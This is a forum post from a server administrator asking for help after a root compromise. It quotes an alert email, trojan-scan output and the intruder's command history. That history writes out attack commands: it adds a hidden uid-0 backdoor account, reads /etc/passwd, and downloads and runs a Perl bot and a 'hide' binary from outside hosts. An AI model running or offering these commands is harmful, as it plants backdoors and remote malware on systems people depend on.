I got rooted. I have recieved this email: IMPORTANT: Do not ignore this email. This message is to inform you that the account lib has user id 0 (root privs). This could mean that your system was compromised (OwN3D). To be safe you should verify that your system has not been compromised. Syslogd and named is failing every 5 minutes and certain things like disk space usage and connections aren't working in a program I use. What's the best thing to do? Few WHM Items: Scan for Trojan Horses Appears Clean /dev/core /dev/hdx1 /dev/hdx2 /dev/saux /dev/stderr Scanning for Trojan Horses..... Possible Trojan - /usr/bin/xmlcatalog . Possible Trojan - /usr/bin/xmllint . . . . . . . Possible Trojan - /usr/lib/python2.4/site-packages/libxml2mod.la . Possible Trojan - /usr/lib/python2.4/site-packages/libxml2mod.so . Possible Trojan - /etc/cron.daily/logrotate And this is my history: 58 last 59 /sbin/ifconfig |grep inet 60 /usr/sbin/useradd -o -u 0 -g 0 -d /usr/lib/libsh lib 61 passwd lib 62 cat /etc/hosts 63 cat /etc/passwd 64 su tf4 65 su tf4 66 cd /home/tf4 67 ls 68 pwd 69 mkdir .cor ; cd .cor ; lwp-download http://members.lycos.co.uk/korekt/bot.txt ; perl bot.txt 70 passwd mysql 71 wget members.lycos.co.uk/acid4u/hide ; chmod +x hide ; ./hide What can I do? I got rooted big time.